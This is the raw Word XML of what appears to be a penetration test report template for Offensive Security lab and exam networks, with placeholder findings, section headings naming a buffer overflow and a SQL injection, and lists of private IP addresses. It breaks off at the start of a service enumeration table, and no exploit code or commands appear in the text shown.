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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OFFENSIVE SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jwro86iplpum" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test Report</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:before="200" w:line="600" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="1887375" cy="1258250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="red-front-page-large.png" id="4" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="red-front-page-large.png" id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1887375" cy="12582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00" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:before="200" w:line="600" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
        <w:sectPr>
          <w:headerReference r:id="rId7" w:type="default"/>
          <w:headerReference r:id="rId8" w:type="first"/>
          <w:footerReference r:id="rId9" w:type="default"/>
          <w:footerReference r:id="rId10" w:type="first"/>
          <w:pgSz w:h="16834" w:w="11909" w:orient="portrait"/>
          <w:pgMar w:bottom="566.9291338582677" w:top="566.9291338582677" w:left="566.9291338582677" w:right="566.9291338582677" w:header="720.0000000000001" w:footer="566.9291338582677"/>
          <w:pgNumType w:start="0"/>
        </w:sect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07">
      <w:pPr>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pos="10771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="80" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>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r13z5qcl1yrw">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1.0 – High-Level Summary</w:t>
            </w:r>
          </w:hyperlink>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_r13z5qcl1yrw \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w: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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_tyjcwt">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1.1 - Recommendations</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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="1"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_3dy6vkm">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2.0 – Methodologies</w:t>
            </w:r>
          </w:hyperlink>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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_etojutmrzv5">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2.1 – Information Gathering</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_etojutmrzv5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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_4d34og8">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2.2 – Service Enumeration</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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_2s8eyo1">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2.3 – Penetration</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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_esbrx11khsmj">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3.0 - Vulnerabilities &amp; Exploits</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> PAGEREF _esbrx11khsmj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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_dy0ywgqpfvzw">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3.10 - Vulnerability Exploited:  Ability Server 2.34 FTP STOR Buffer Overflow</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_dy0ywgqpfvzw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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="720" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_65ak4lmpas42">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3.11 - System Vulnerable: 172.16.203.134</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_65ak4lmpas42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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_oloo5y8k9nd2">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3.20 - Vulnerability Exploited:  MySQL Injection</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_oloo5y8k9nd2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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="720" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_7vizyupzadse">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3.21 - System Vulnerable: 172.16.203.135</w:t>
            </w:r>
          </w:hyperlink>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_7vizyupzadse \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="1"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_gfxi4hbnbdsu">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4.0 - Maintaining Access</w:t>
            </w:r>
          </w:hyperlink>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_gfxi4hbnbdsu \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w: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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="1"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_b909oqmbepl">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5.0 – House Cleaning</w:t>
            </w:r>
          </w:hyperlink>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_b909oqmbepl \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w: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771.653543307086"/>
            </w:tabs>
            <w:spacing w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="1"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_kfjgkxlrv3ge">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6.0 - Additional Items</w:t>
            </w:r>
          </w:hyperlink>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_kfjgkxlrv3ge \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w: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771.653543307086"/>
            </w:tabs>
            <w:spacing w:after="80" w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
              <w:b w:val="1"/>
              <w:i w:val="0"/>
              <w:smallCaps w:val="0"/>
              <w:strike w:val="0"/>
              <w:color w:val="000000"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_ue06wu74youv">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7.0 - References</w:t>
            </w:r>
          </w:hyperlink>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_ue06wu74youv \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w: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sectPr>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="16834" w:w="11909" w:orient="portrait"/>
          <w:pgMar w:bottom="566.9291338582677" w:top="566.9291338582677" w:left="566.9291338582677" w:right="566.9291338582677" w:header="720.0000000000001" w:footer="113.38582677165356"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r13z5qcl1yrw" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.0 – High-Level Summary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John Doe was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal lab systems – the THINC.local domain. John’s overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.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When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network. When performing the attacks, John was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.  During the testing, John had administrative level access to multiple systems. All systems were successfully exploited and access granted. These systems as well as a brief description on how access was obtained are listed below:</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Lab Trophy 1 – Got in through X</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Lab Trophy 2 – Got in through X</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Lab Trophy 3 – Got in through X</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Exam Trophy 1 – Got in through X</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Exam Trophy 2 – Got in through X</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tyjcwt" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 - Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.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sectPr>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="16834" w:w="11909" w:orient="portrait"/>
          <w:pgMar w:bottom="566.9291338582677" w:top="566.9291338582677" w:left="566.9291338582677" w:right="566.9291338582677" w:header="720" w:footer="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3dy6vkm" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.0 – Methodologies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John utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how John was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1t3h5sf" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_etojutmrzv5" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 – Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, John was tasked with exploiting the lab and exam network. The specific IP addresses were:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fr66n03tfe65" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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1"/>
        <w:tblW w:w="1077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7"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="10777"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
            <w:pPr>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Lab Network</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32">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.1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33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.2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34">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="1077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77"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="10777"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
            <w:pPr>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Exam Network</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38">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.203.133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39">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.203.135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3A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.16.203.136</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:after="200" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4d34og8" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 – Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.  In some cases, some ports may not be listed.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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="1077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88.5"/>
        <w:gridCol w:w="5388.5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="5388.5"/>
            <w:gridCol w:w="5388.5"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716"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efefef"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="efefef"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Server IP Address</w:t>
            </w:r>
          </w:p>
